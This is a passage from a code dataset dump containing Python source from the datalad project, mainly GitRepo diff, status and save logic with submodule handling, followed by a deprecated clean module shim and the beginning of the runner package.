lgr.debug('Query status of %r for %s paths',\n self, len(paths) if paths is not None else 'all')\n return self.diffstatus(\n fr='HEAD' if self.get_hexsha() else None,\n to=None,\n paths=paths,\n untracked=untracked,\n eval_submodule_state=eval_submodule_state)\n\n def diff(self, fr: Optional[str], to: Optional[str], paths: Optional[Sequence[str | PathLike[str]]] = None, untracked: str = 'all',\n eval_submodule_state: Literal[\"commit\", \"full\", \"no\"] = 'full') -> dict[Path, dict[str, str]]:\n \"\"\"Like status(), but reports changes between to arbitrary revisions\n\n Parameters\n ----------\n fr : str or None\n Revision specification (anything that Git understands). Passing\n `None` considers anything in the target state as new.\n to : str or None\n Revision specification (anything that Git understands), or None\n to compare to the state of the work tree.\n paths : list or None\n If given, limits the query to the specified paths. To query all\n paths specify `None`, not an empty list.\n untracked : {'no', 'normal', 'all'}\n If and how untracked content is reported when `to` is None:\n 'no': no untracked files are reported; 'normal': untracked files\n and entire untracked directories are reported as such; 'all': report\n individual files even in fully untracked directories.\n eval_submodule_state : {'full', 'commit', 'no'}\n If 'full' (the default), the state of a submodule is evaluated by\n considering all modifications, with the treatment of untracked files\n determined by `untracked`. If 'commit', the modification check is\n restricted to comparing the submodule's HEAD commit to the one\n recorded in the superdataset. If 'no', the state of the subdataset is\n not evaluated.\n\n Returns\n -------\n dict\n Each content item has an entry under a pathlib `Path` object instance\n pointing to its absolute path inside the repository (this path is\n guaranteed to be underneath `Repo.path`).\n Each value is a dictionary with properties:\n\n `type`\n Can be 'file', 'symlink', 'dataset', 'directory'\n `state`\n Can be 'added', 'untracked', 'clean', 'deleted', 'modified'.\n \"\"\"\n return {k: v for k, v in self.diffstatus(\n fr=fr, to=to, paths=paths,\n untracked=untracked,\n eval_submodule_state=eval_submodule_state).items()\n if v.get('state', None) != 'clean'}\n\n @overload\n def diffstatus(self, fr: Optional[str], to: Optional[str], paths: Optional[Sequence[str | PathLike[str]]] = None, untracked: str = 'all', *, eval_submodule_state: Literal[\"global\"], _cache: Optional[dict] = None) -> str:\n ...\n\n @overload\n def diffstatus(self, fr: Optional[str], to: Optional[str], paths: Optional[Sequence[str | PathLike[str]]] = None, untracked: str = 'all', eval_submodule_state: Literal[\"commit\", \"full\", \"no\"] = \"full\", _cache: Optional[dict] = None) -> dict[Path, dict[str, str]]:\n ...\n\n def diffstatus(self, fr: Optional[str], to: Optional[str], paths: Optional[Sequence[str | PathLike[str]]] = None, untracked: str = 'all',\n eval_submodule_state: str = 'full', _cache: Optional[dict] = None) -> dict[Path, dict[str, str]] | str:\n\n \"\"\"Like diff(), but reports the status of 'clean' content too.\n\n It supports an additional submodule evaluation state 'global'.\n If given, it will return a single 'modified'\n (vs. 'clean') state label for the entire repository, as soon as\n it can.\n \"\"\"\n def _get_cache_key(label: str, paths: Optional[list[Path]], ref: Optional[str], untracked: Optional[str] = None) -> tuple[str, str, Optional[tuple[Path, ...]], Optional[str], Optional[str]]:\n return self.path, label, tuple(paths) if paths else None, \\\n ref, untracked\n\n if _cache is None:\n _cache = {}\n\n ppaths: Optional[list[Path]]\n if paths is not None:\n # at this point we must normalize paths to the form that\n # Git would report them, to easy matching later on\n ppaths = [\n p.relative_to(self.pathobj) if p.is_absolute() else p\n for p in map(ut.Path, paths)\n ]\n else:\n ppaths = None\n\n # TODO report more info from get_content_info() calls in return\n # value, those are cheap and possibly useful to a consumer\n # we need (at most) three calls to git\n if to is None:\n # everything we know about the worktree, including os.stat\n # for each file\n key = _get_cache_key('ci', ppaths, None, untracked)\n if key in _cache:\n to_state = _cache[key]\n else:\n to_state = self.get_content_info(\n paths=ppaths, ref=None, untracked=untracked)\n _cache[key] = to_state\n # we want Git to tell us what it considers modified and avoid\n # reimplementing logic ourselves\n key = _get_cache_key('mod', ppaths, None)\n if key in _cache:\n modified = _cache[key]\n else:\n # from Git 2.31.0 onwards ls-files has --deduplicate\n # by for backward compatibility keep doing deduplication here\n modified = set(\n self.pathobj.joinpath(ut.PurePosixPath(p))\n for p in self.call_git_items_(\n # we must also look for deleted files, for the logic\n # below to work. Only from Git 2.31.0 would they be\n # included with `-m` alone\n ['ls-files', '-z', '-m', '-d'],\n # low-level code cannot handle pathobjs\n files=[str(p) for p in ppaths] if ppaths is not None else None,\n sep='\\0',\n read_only=True)\n if p)\n _cache[key] = modified\n else:\n key = _get_cache_key('ci', ppaths, to)\n if key in _cache:\n to_state = _cache[key]\n else:\n to_state = self.get_content_info(paths=ppaths, ref=to)\n _cache[key] = to_state\n # we do not need worktree modification detection in this case\n modified = None\n # origin state\n key = _get_cache_key('ci', ppaths, fr)\n if key in _cache:\n from_state = _cache[key]\n else:\n if fr:\n from_state = self.get_content_info(paths=ppaths, ref=fr)\n else:\n # no ref means from nothing\n from_state = {}\n _cache[key] = from_state\n\n status = dict()\n for f, to_state_r in to_state.items():\n props = self._diffstatus_get_state_props(\n f,\n from_state.get(f, None),\n to_state_r,\n # are we comparing against a recorded commit or the worktree\n to is not None,\n # if we have worktree modification info, report if\n # path is reported as modified in it\n modified and f in modified,\n eval_submodule_state)\n # potential early exit in \"global\" eval mode\n if eval_submodule_state == 'global' and \\\n props.get('state', None) not in ('clean', None):\n # any modification means globally 'modified'\n return 'modified'\n status[f] = props\n\n for f, from_state_r in from_state.items():\n if f not in to_state:\n # we new this, but now it is gone and Git is not complaining\n # about it being missing -> properly deleted and deletion\n # stages\n status[f] = dict(\n state='deleted',\n type=from_state_r['type'],\n # report the shasum to distinguish from a plainly vanished\n # file\n gitshasum=from_state_r['gitshasum'],\n )\n if eval_submodule_state == 'global':\n return 'modified'\n\n if to is not None or eval_submodule_state == 'no':\n # if we have `to` we are specifically comparing against\n # a recorded state, and this function only attempts\n # to label the state of a subdataset, not investigate\n # specifically what the changes in subdatasets are\n # this is done by a high-level command like rev-diff\n # so the comparison within this repo and the present\n # `state` label are all we need, and they are done already\n if eval_submodule_state == 'global':\n return 'clean'\n else:\n return status\n\n # loop over all subdatasets and look for additional modifications\n for f, st in status.items():\n f = str(f)\n if 'state' in st or not st['type'] == 'dataset':\n # no business here\n continue\n if not GitRepo.is_valid_repo(f):\n # submodule is not present, no chance for a conflict\n st['state'] = 'clean'\n continue\n # we have to recurse into the dataset and get its status\n subrepo = repo_from_path(f)\n # get the HEAD commit, or the one of the corresponding branch\n # only that one counts re super-sub relationship\n # save() syncs the corresponding branch each time\n subrepo_commit = subrepo.get_hexsha(subrepo.get_corresponding_branch())\n st['gitshasum'] = subrepo_commit\n # subdataset records must be labeled clean up to this point\n # test if current commit in subdataset deviates from what is\n # recorded in the dataset\n st['state'] = 'modified' \\\n if st['prev_gitshasum'] != subrepo_commit \\\n else 'clean'\n if eval_submodule_state == 'global' and st['state'] == 'modified':\n return 'modified'\n if eval_submodule_state == 'commit':\n continue\n # the recorded commit did not change, so we need to make\n # a more expensive traversal\n st['state'] = subrepo.diffstatus(\n # we can use 'HEAD' because we know that the commit\n # did not change. using 'HEAD' will facilitate\n # caching the result\n fr='HEAD',\n to=None,\n paths=None,\n untracked=untracked,\n eval_submodule_state='global',\n _cache=_cache) if st['state'] == 'clean' else 'modified'\n if eval_submodule_state == 'global' and st['state'] == 'modified':\n return 'modified'\n\n if eval_submodule_state == 'global':\n return 'clean'\n else:\n return status\n\n def _diffstatus_get_state_props(self, f: Path,\n from_state: Optional[dict[str, str]],\n to_state: dict[str, str],\n against_commit: bool,\n modified_in_worktree: bool,\n eval_submodule_state: str) -> dict[str, str]:\n \"\"\"Helper to determine diff properties for a single path\n\n Parameters\n ----------\n f : Path\n from_state : dict\n to_state : dict\n against_commit : bool\n Flag whether `to_state` reflects a commit or the worktree.\n modified_in_worktree : bool\n Flag whether a worktree modification is reported. This is ignored\n when `against_commit` is True.\n eval_submodule_state : {'commit', 'no', ...}\n \"\"\"\n if against_commit:\n # we can ignore any worktree modification reported when\n # comparing against a commit\n modified_in_worktree = False\n\n props = {}\n if 'type' in to_state:\n props['type'] = to_state['type']\n\n to_sha = to_state['gitshasum']\n from_sha = from_state['gitshasum'] if from_state else None\n\n # determine the state of `f` from from_state and to_state records, if\n # it can be determined conclusively from it. If not, it will\n # stay None for now\n state = None\n if not from_state:\n # this is new, or rather not known to the previous state\n state = 'added' if to_sha else 'untracked'\n elif to_sha == from_sha and not modified_in_worktree:\n # something that is seemingly unmodified, based on the info\n # gathered so far\n if to_state['type'] == 'dataset':\n if against_commit or eval_submodule_state == 'commit':\n # we compare against a recorded state, just based on\n # the shas we can be confident, otherwise the state\n # of a subdataset isn't fully known yet, because\n # `modified_in_worktree` will only reflect changes\n # in the commit of a subdataset without looking into\n # it for uncommitted changes. Such tests are done\n # later and based on further conditionals for\n # performance reasons\n state = 'clean'\n else:\n # no change in git record, and no change on disk\n # at this point we know that the reported object ids\n # for this file are identical in the to and from\n # records. If to is None, we're comparing to the\n # working tree and a deleted file will still have an\n # identical id, so we need to check whether the file is\n # gone before declaring it clean. This working tree\n # check is irrelevant and wrong if to is a ref.\n state = 'clean' \\\n if against_commit or (f.exists() or f.is_symlink()) \\\n else 'deleted'\n else:\n # change in git record, or on disk\n # for subdatasets leave the 'modified' judgement to the caller\n # for supporting corner cases, such as adjusted branch\n # which require inspection of a subdataset\n # TODO we could have a new file that is already staged\n # but had subsequent modifications done to it that are\n # unstaged. Such file would presently show up as 'added'\n # ATM I think this is OK, but worth stating...\n state = ('modified'\n if against_commit or to_state['type'] != 'dataset'\n else None\n ) if f.exists() or f.is_symlink() else 'deleted'\n # TODO record before and after state for diff-like use\n # cases\n\n if state in ('clean', 'added', 'modified', None):\n # assign present gitsha to any record\n # state==None can only happen for subdatasets that\n # already existed, so also assign a sha for them\n props['gitshasum'] = to_sha\n if 'bytesize' in to_state:\n # if we got this cheap, report it\n props['bytesize'] = to_state['bytesize']\n elif state == 'clean':\n assert from_state is not None\n if 'bytesize' in from_state:\n # no change, we can take this old size info\n props['bytesize'] = from_state['bytesize']\n if state in ('clean', 'modified', 'deleted', None):\n # assign previous gitsha to any record\n # state==None can only happen for subdatasets that\n # already existed, so also assign a sha for them\n assert from_sha is not None\n props['prev_gitshasum'] = from_sha\n if state:\n # only report a state if we could determine any\n # outside code tests for existence of the property\n # and not (always) for the value\n props['state'] = state\n return props\n\n def _save_pre(self, paths: Optional[Sequence[str | PathLike[str]]], _status: Optional[dict[Path, dict[str, str]]], **kwargs: Any) -> Optional[dict[Path, dict[str, str]]]:\n # helper to get an actionable status report\n if paths is not None and not paths and not _status:\n return None\n if _status is None:\n if 'untracked' not in kwargs:\n kwargs['untracked'] = 'normal'\n status = self.status(\n paths=paths,\n **{k: kwargs[k] for k in kwargs\n if k in ('untracked', 'eval_submodule_state')})\n else:\n # we want to be able to add items down the line\n # make sure to detach from prev. owner\n status = _status.copy()\n return status\n\n def get_staged_paths(self) -> list[str]:\n \"\"\"Returns a list of any stage repository path(s)\n\n This is a rather fast call, as it will not depend on what is going on\n in the worktree.\n \"\"\"\n try:\n return list(self.call_git_items_(\n ['diff', '--name-only', '--staged'],\n expect_stderr=True))\n except CommandError as e:\n lgr.debug(CapturedException(e))\n return []\n\n def _save_post(self, message: Optional[str], files: Iterable[Path], partial_commit: bool, amend: bool = False,\n allow_empty: bool = False) -> None:\n # helper to commit changes reported in status\n\n # TODO remove pathobj stringification when commit() can\n # handle it\n to_commit = [str(f.relative_to(self.pathobj))\n for f in files] \\\n if partial_commit else None\n if not partial_commit or to_commit or allow_empty or \\\n (amend and message):\n # we directly call GitRepo.commit() to avoid a whole slew\n # if direct-mode safeguards and workarounds in the AnnexRepo\n # implementation (which also run an additional dry-run commit\n GitRepo.commit(\n self,\n files=to_commit,\n msg=message,\n options=to_options(amend=amend, allow_empty=allow_empty),\n # do not raise on empty commit\n # it could be that the `add` in this save-cycle has already\n # brought back a 'modified' file into a clean state\n careless=True,\n )\n\n def save(self, message: Optional[str] = None, paths: Optional[list[Path]] = None, _status: Optional[dict[Path, dict[str, str]]] = None, **kwargs: Any) -> list[dict]:\n \"\"\"Save dataset content.\n\n Parameters\n ----------\n message : str or None\n A message to accompany the changeset in the log. If None,\n a default message is used.\n paths : list or None\n Any content with path matching any of the paths given in this\n list will be saved. Matching will be performed against the\n dataset status (GitRepo.status()), or a custom status provided\n via `_status`. If no paths are provided, ALL non-clean paths\n present in the repo status or `_status` will be saved.\n _status : dict or None\n If None, Repo.status() will be queried for the given `ds`. If\n a dict is given, its content will be used as a constraint.\n For example, to save only modified content, but no untracked\n content, set `paths` to None and provide a `_status` that has\n no entries for untracked content.\n **kwargs :\n Additional arguments that are passed to underlying Repo methods.\n Supported:\n\n - git : bool (passed to Repo.add()\n - eval_submodule_state : {'full', 'commit', 'no'}\n passed to Repo.status()\n - untracked : {'no', 'normal', 'all'} - passed to Repo.status()\n - amend : bool (passed to GitRepo.commit)\n \"\"\"\n return list(\n self.save_(\n message=message,\n paths=paths,\n _status=_status,\n **kwargs\n )\n )\n\n def save_(self, message: Optional[str] = None, paths: Optional[list[Path]] = None, _status: Optional[dict[Path, dict[str, str]]] = None, **kwargs: Any) -> Iterator[dict]:\n \"\"\"Like `save()` but working as a generator.\"\"\"\n from datalad.interface.results import get_status_dict\n\n status_state = _get_save_status_state(\n self._save_pre(paths, _status, **kwargs) or {}\n )\n amend = kwargs.get('amend', False)\n\n # TODO: check on those None's -- may be those are also \"nothing to worry about\"\n # and we could just return?\n if not any(status_state.values()) and not (message and amend):\n # all clean, nothing todo\n lgr.debug('Nothing to save in %r, exiting early', self)\n return\n\n # three things are to be done:\n # - remove (deleted if not already staged)\n # - add (modified/untracked)\n # - commit (with all paths that have been touched, to bypass\n # potential pre-staged bits)\n\n staged_paths = self.get_staged_paths()\n need_partial_commit = bool(staged_paths)\n if need_partial_commit and hasattr(self, \"call_annex\"):\n # so we have some staged content. let's check which ones\n # are symlinks -- those could be annex key links that\n # are broken after a `git-mv` operation\n # https://github.com/datalad/datalad/issues/4967\n # call `git-annex pre-commit` on them to rectify this before\n # saving the wrong symlinks\n added = status_state['added']\n tofix = [\n sp for sp in staged_paths\n if added.get(self.pathobj / sp, {}).get(\"type\") == \"symlink\"\n ]\n if tofix:\n self.call_annex(['pre-commit'], files=tofix)\n\n submodule_change = False\n\n if status_state['deleted']:\n vanished_subds = [\n str(f.relative_to(self.pathobj))\n for f, props in status_state['deleted'].items()\n if props.get('type') == 'dataset'\n ]\n if vanished_subds:\n # we submodule removal we use `git-rm`, because the clean-up\n # is more complex than just an index update -- make no\n # sense to have a duplicate implementation.\n # we do not yield here, but only altogether below -- we are just\n # processing gone components, should always be quick.\n self._call_git(['rm', '-q'], files=vanished_subds)\n submodule_change = True\n # remove anything from the index that was found to be gone\n self._call_git(\n ['update-index', '--remove'],\n files=[\n str(f.relative_to(self.pathobj))\n for f, props in status_state['deleted'].items()\n # do not update the index, if there is already\n # something staged for this path (e.g.,\n # a directory was removed and a file staged\n # in its place)\n if not props.get('gitshasum')\n # we already did the submodules\n and props.get('type') != 'dataset'\n ]\n )\n # now yield all deletions\n for p, props in status_state['deleted'].items():\n yield get_status_dict(\n action='delete',\n refds=self.pathobj,\n type=props.get('type'),\n path=str(p),\n status='ok',\n logger=lgr)\n\n # TODO this additional query should not be, based on status as given\n # if anyhow possible, however, when paths are given, status may\n # not contain all required information. In case of path=None AND\n # _status=None, we should be able to avoid this, because\n # status should have the full info already\n # looks for contained repositories\n untracked_dirs = [\n f.relative_to(self.pathobj)\n for f, props in status_state['untracked'].items()\n if props.get('type', None) == 'directory']\n to_add_submodules = []\n if untracked_dirs:\n to_add_submodules = [\n sm for sm, sm_props in\n self.get_content_info(\n untracked_dirs,\n ref=None,\n # request exhaustive list, so that everything that is\n # still reported as a directory must be its own repository\n untracked='all').items()\n if sm_props.get('type', None) == 'directory']\n to_add_submodules = _prune_deeper_repos(to_add_submodules)\n\n to_stage_submodules = {\n f: props\n for f, props in status_state['modified_or_untracked'].items()\n if props.get('type', None) == 'dataset'}\n if to_stage_submodules:\n lgr.debug(\n '%i submodule path(s) to stage in %r %s',\n len(to_stage_submodules), self,\n to_stage_submodules\n if len(to_stage_submodules) < 10 else '')\n to_add_submodules += list(to_stage_submodules)\n\n if to_add_submodules:\n for r in self._save_add_submodules(to_add_submodules):\n if r.get('status', None) == 'ok':\n submodule_change = True\n yield r\n\n if submodule_change:\n # this will alter the config, reload\n self.config.reload()\n # need to include .gitmodules in what needs committing\n f = self.pathobj.joinpath('.gitmodules')\n status_state['modified_or_untracked'][f] = \\\n status_state['modified'][f] = \\\n dict(type='file', state='modified')\n # now stage .gitmodules\n self._call_git(['update-index', '--add'], files=['.gitmodules'])\n # and report on it\n yield get_status_dict(\n action='add',\n refds=self.pathobj,\n type='file',\n path=f,\n status='ok',\n logger=lgr)\n\n to_add = {\n # TODO remove pathobj stringification when add() can\n # handle it\n str(f.relative_to(self.pathobj)): props\n for f, props in status_state['modified_or_untracked'].items()\n if not (f in to_add_submodules or f in to_stage_submodules)}\n if to_add:\n compat_config = \\\n self.config.obtain(\"datalad.save.windows-compat-warning\")\n to_add, problems = self._check_for_win_compat(to_add, compat_config)\n lgr.debug(\n '%i path(s) to add to %s %s',\n len(to_add), self, to_add if len(to_add) < 10 else '')\n\n if to_add:\n yield from self._save_add(\n to_add,\n git_opts=None,\n **{k: kwargs[k] for k in kwargs\n if k in (('git',) if hasattr(self, 'uuid')\n else tuple())})\n if problems:\n from datalad.interface.results import get_status_dict\n msg = \\\n 'Incompatible name for Windows systems; disable with ' \\\n 'datalad.save.windows-compat-warning.',\n for path in problems:\n yield get_status_dict(\n action='save',\n refds=self.pathobj,\n type='file',\n path=(self.pathobj / ut.PurePosixPath(path)),\n status='impossible',\n message=msg,\n logger=lgr)\n\n\n # https://github.com/datalad/datalad/issues/6558\n # file could have become a directory. Unfortunately git\n # would then mistakenly refuse to commit if that old path is also\n # given to commit, so we better filter it out\n if status_state['deleted'] and status_state['added']:\n # check if any \"deleted\" is a directory now. Then for those\n # there should be some other path under that directory in 'added'\n for f in [_ for _ in status_state['deleted'] if _.is_dir()]:\n # this could potentially be expensive if lots of files become\n # directories, but it is unlikely to happen often\n # Note: PurePath.is_relative_to was added in 3.9 and seems slowish\n # path_is_subpath faster, also if comparing to \"in f.parents\"\n f_str = str(f)\n if any(path_is_subpath(str(f2), f_str) for f2 in status_state['added']):\n status_state['deleted'].pop(f) # do not bother giving it to commit below in _save_post\n\n # Note, that allow_empty is always ok when we amend. Required when we\n # amend an empty commit while the amendment is empty, too (though\n # possibly different message). If an empty commit was okay before, it's\n # okay now.\n status_state.pop('modified_or_untracked') # pop the hybrid state\n self._save_post(message, chain(*status_state.values()), need_partial_commit, amend=amend,\n allow_empty=amend)\n # TODO yield result for commit, prev helper checked hexsha pre\n # and post...\n\n def _check_for_win_compat(self, files: dict[str, Any], config: str) -> tuple[dict[str, Any], Optional[list[str]]]:\n \"\"\"Check file names for illegal characters or reserved names on Windows\n\n In the case that a non-Windows-compatible file is detected, warn users\n about potential interoperability issues.\n\n Parameters\n ----------\n files\n list of files to add\n config\n value of self.config.obtain(\"datalad.save.windows-compat-warning\"),\n used to choose appropriate behavior. \"none\" performs no check,\n \"warning\" warns in case of incompatibilities, and \"error\" results in\n an error result in case of incompatibilities\n \"\"\"\n # don't perform any check when the configuration is set to 'none'\n if config == 'none':\n return files, None\n\n from collections import defaultdict\n problems: dict[str, list[str]] = defaultdict(list)\n for file in files:\n for part in Path(file).parts:\n # check every component of the path for incompatibilities\n if Path(part).stem.upper() in RESERVED_NAMES_WIN:\n problems['Elements using a reserved filename:'].append(part)\n problems['paths'].append(file)\n if re.search(ILLEGAL_CHARS_WIN, part):\n problems['Elements with illegal characters:'].append(part)\n problems['paths'].append(file)\n if part.endswith('.'):\n problems['Elements ending with a dot:'].append(part)\n problems['paths'].append(file)\n if part.endswith(' '):\n problems['Elements ending with a space:'].append(part)\n problems['paths'].append(file)\n if not problems:\n return files, None\n msg = \\\n \"Some elements of your dataset are not compatible with \" \\\n \"Windows systems. Disable this check by changing \" \\\n \"datalad.save.windows-compat-warning or consider renaming \" \\\n \"the following elements: \"\n for k, v in problems.items():\n # use the key as an explanation, and report filenames only once\n msg += f\"\\n{k} {[*{*v}]}\" if k != 'paths' else ''\n if config == 'warning':\n lgr.warning(msg)\n return files, None\n\n elif config == 'error':\n # take the problematic files out of to_add\n for path in [*{*problems['paths']}]:\n files.pop(path)\n return files, [*{*problems['paths']}]\n\n else:\n raise ValueError(f\"Invalid 'config' value {config!r}\")\n\n def _save_add(self, files: dict[str, Any], git_opts: Optional[list[str]] = None) -> Iterator[dict]:\n \"\"\"Simple helper to add files in save()\"\"\"\n from datalad.interface.results import get_status_dict\n try:\n # without --verbose git 2.9.3 add does not return anything\n add_out = self._call_git(\n # Set annex.largefiles to prevent storing files in\n # annex with a v6+ annex repo.\n ['-c', 'annex.largefiles=nothing', 'add'] +\n ensure_list(git_opts) + ['--verbose'],\n files=list(files.keys()),\n pathspec_from_file=True,\n )\n # get all the entries\n for r in self._process_git_get_output(*add_out):\n yield get_status_dict(\n action=str(r.get('command', 'add')),\n refds=self.pathobj,\n type='file',\n path=(self.pathobj / ut.PurePosixPath(r['file']))\n if 'file' in r else None,\n status='ok' if r.get('success', None) else 'error',\n key=r.get('key', None),\n # while there is no git-annex underneath here, we\n # tend to fake its behavior, so we can also support\n # this type of messaging\n #message='\\n'.join(r['error-messages'])\n #if 'error-messages' in r else None,\n message=None,\n logger=lgr)\n except OSError as e:\n lgr.error(\"add: %s\", e)\n raise\n\n def _save_add_submodules(self, paths: list[Path] | dict[Path, dict]) -> Iterator[dict]:\n \"\"\"Add new submodules, or updates records of existing ones\n\n This method does not use `git submodule add`, but aims to be more\n efficient by limiting the scope to mere in-place registration of\n multiple already present repositories.\n\n Parameters\n ----------\n paths : list(Path)\n\n Yields\n ------\n dict\n Result records\n \"\"\"\n from datalad.interface.results import get_status_dict\n\n # first gather info from all datasets in read-only fashion, and then\n # update index, .gitmodules and .git/config at once\n info = []\n # To avoid adding already known: https://github.com/datalad/datalad/issues/6843\n # We must not add already known submodules explicitly since \"untracked\"\n # can be assigned even for known ones (TODO: add issue, might have been closed)?\n # Not sure if operating on relative paths would provide any speed up so use full\n known_sub_paths = {s['path'] for s in self.get_submodules_()}\n for path in paths:\n already_known = path in known_sub_paths\n rpath = str(path.relative_to(self.pathobj).as_posix())\n subm = repo_from_path(path)\n # if there is a corresponding branch, we want to record it's state.\n # we rely on the corresponding branch being synced already.\n # `save` should do that each time it runs.\n subm_commit = subm.get_hexsha(subm.get_corresponding_branch())\n if not subm_commit:\n yield get_status_dict(\n action='add_submodule',\n ds=self,\n path=str(path),\n status='error',\n message=('cannot add subdataset %s with no commits', subm),\n logger=lgr)\n continue\n # make an attempt to configure a submodule source URL based on the\n # discovered remote configuration\n remote, branch = subm.get_tracking_branch()\n url = subm.get_remote_url(remote) if remote else None\n if url is None:\n url = './{}'.format(rpath)\n subm_id = subm.config.get('datalad.dataset.id', None)\n info.append(\n dict(\n # if we have additional information on this path, pass it on.\n # if not, treat it as an untracked directory\n paths[path] if isinstance(paths, dict)\n else dict(type='directory', state='untracked'),\n path=path, rpath=rpath, commit=subm_commit, id=subm_id,\n url=url, known=already_known))\n\n # bypass any convenience or safe-manipulator for speed reasons\n # use case: saving many new subdatasets in a single run\n with (self.pathobj / '.gitmodules').open('a') as gmf, \\\n (self.pathobj / '.git' / 'config').open('a') as gcf:\n for i in info:\n # we update the subproject commit unconditionally\n self.call_git([\n 'update-index', '--add', '--replace', '--cacheinfo', '160000',\n i['commit'], i['rpath']\n ])\n # only write the .gitmodules/.config changes when this is not yet\n # a subdataset and not yet already known\n # TODO: we could update the URL, and branch info at this point,\n # even for previously registered subdatasets\n if not i['known'] and (i['type'] != 'dataset' or (\n i['type'] == 'dataset' and i['state'] == 'untracked')):\n gmprops = dict(path=i['rpath'], url=i['url'])\n if i['id']:\n gmprops['datalad-id'] = i['id']\n write_config_section(\n gmf, 'submodule', i['rpath'], gmprops)\n write_config_section(\n gcf, 'submodule', i['rpath'], dict(active='true', url=i['url']))\n\n # This mirrors the result structure yielded for\n # to_stage_submodules below.\n yield get_status_dict(\n action='add',\n refds=self.pathobj,\n type='dataset',\n key=None,\n path=i['path'],\n status='ok',\n logger=lgr)\n\n\ndef _get_save_status_state(status: dict[Path, dict[str, str]]) -> dict[Optional[str], dict[Path, dict[str, str]]]:\n \"\"\"\n Returns\n -------\n dict\n By status category by file path, mapped to status properties.\n \"\"\"\n # Sort status into status by state with explicit list of states\n # (excluding clean we do not care about) we expect to be present\n # and which we know of (unless None), and modified_or_untracked hybrid\n # since it is used below\n status_state: dict[Optional[str], dict[Path, dict[str, str]]] = {\n k: {}\n for k in (None, # not cared of explicitly here\n 'added', # not cared of explicitly here\n # 'clean' # not even wanted since nothing to do about those\n 'deleted',\n 'modified',\n 'untracked',\n 'modified_or_untracked', # hybrid group created here\n )}\n for f, props in status.items():\n state = props.get('state', None)\n if state == 'clean':\n # we don't care about clean\n continue\n if state == 'modified' and props.get('gitshasum') \\\n and props.get('gitshasum') == props.get('prev_gitshasum'):\n # reported as modified, but with identical shasums -> typechange\n # a subdataset maybe? do increasingly expensive tests for\n # speed reasons\n if props.get('type') != 'dataset' and f.is_dir() \\\n and GitRepo.is_valid_repo(f):\n # it was not a dataset, but now there is one.\n # we declare it untracked to engage the discovery tooling.\n state = 'untracked'\n props = dict(type='dataset', state='untracked')\n status_state[state][f] = props\n # The hybrid one to retain the same order as in original status\n if state in ('modified', 'untracked'):\n status_state['modified_or_untracked'][f] = props\n return status_state\n\n\n# used in in the get command and GitRepo.add_submodule(), the\n# latter is not used outside the tests\ndef _fixup_submodule_dotgit_setup(ds: Dataset, relativepath: str | Path) -> None:\n \"\"\"Implementation of our current of .git in a subdataset\n\n Each subdataset/module has its own .git directory where a standalone\n repository would have it. No gitdir files, no symlinks.\n \"\"\"\n # move .git to superrepo's .git/modules, remove .git, create\n # .git-file\n path = opj(ds.path, relativepath)\n subds_dotgit = opj(path, \".git\")\n\n repo = GitRepo(path, create=False)\n if repo.dot_git.parent == repo.pathobj:\n # this is what we want\n return\n\n # first we want to remove any conflicting worktree setup\n # done by git to find the checkout at the mountpoint of the\n # submodule, if we keep that, any git command will fail\n # after we move .git\n # Ben: Shouldn't we re-setup a possible worktree afterwards?\n repo.config.unset('core.worktree', scope='local')\n # what we have here is some kind of reference, remove and\n # replace by the target\n os.remove(subds_dotgit)\n # make absolute\n src_dotgit = str(repo.dot_git)\n # move .git\n from os import (\n listdir,\n rename,\n rmdir,\n )\n ensure_dir(subds_dotgit)\n for dot_git_entry in listdir(src_dotgit):\n rename(opj(src_dotgit, dot_git_entry),\n opj(subds_dotgit, dot_git_entry))\n assert not listdir(src_dotgit)\n rmdir(src_dotgit)\n\n\n# try retro-fitting GitRepo with deprecated functionality\n# must be done last in this file\ntry:\n from datalad_deprecated.gitrepo import DeprecatedGitRepoMethods\n for symbol in dir(DeprecatedGitRepoMethods):\n if symbol.startswith('__'):\n # ignore Python internals\n continue\n if hasattr(GitRepo, symbol):\n lgr.debug(\n 'Not retro-fitted GitRepo with deprecated %s, '\n 'name-space conflict', symbol)\n # do not override existing symbols\n continue\n # assign deprecated symbol to GitRepo\n setattr(GitRepo, symbol, getattr(DeprecatedGitRepoMethods, symbol))\n lgr.debug('Retro-fitted GitRepo with deprecated %s', symbol)\nexcept ImportError as e:\n ce = CapturedException(e)\n lgr.debug(\n 'Not retro-fitting GitRepo with deprecated symbols, '\n 'datalad-deprecated package not found')\n" }, { "alpha_fraction": 0.5471447706222534, "alphanum_fraction": 0.5604249835014343, "avg_line_length": 36.650001525878906, "blob_id": "e75341ef3af32047a9d8d28eb293767e2b0da1a7", "content_id": "921c6f4f2a39c751e43e4ab765a35e6b99c91e9f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 753, "license_type": "permissive", "max_line_length": 87, "num_lines": 20, "path": "/datalad/interface/clean.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Obsolete module: moved to `local.clean`\n\"\"\"\n\nimport warnings\nwarnings.warn(\n \"Clean has been moved to datalad.local.clean. \"\n \"This module was deprecated in 0.16.0, and will be removed in a future \"\n \"release. Please adjust the import.\",\n DeprecationWarning)\n\n# Import command class to ease 3rd-party transitions\nfrom datalad.local.clean import Clean\n" }, { "alpha_fraction": 0.5716234445571899, "alphanum_fraction": 0.5784447193145752, "avg_line_length": 32.318180084228516, "blob_id": "6bc6998c51b72bd8e38a087e144142c268625d30", "content_id": "c29b6d8b6045291988fd57a84906bb107c375844", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 733, "license_type": "permissive", "max_line_length": 87, "num_lines": 22, "path": "/datalad/runner/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"DataLad command execution 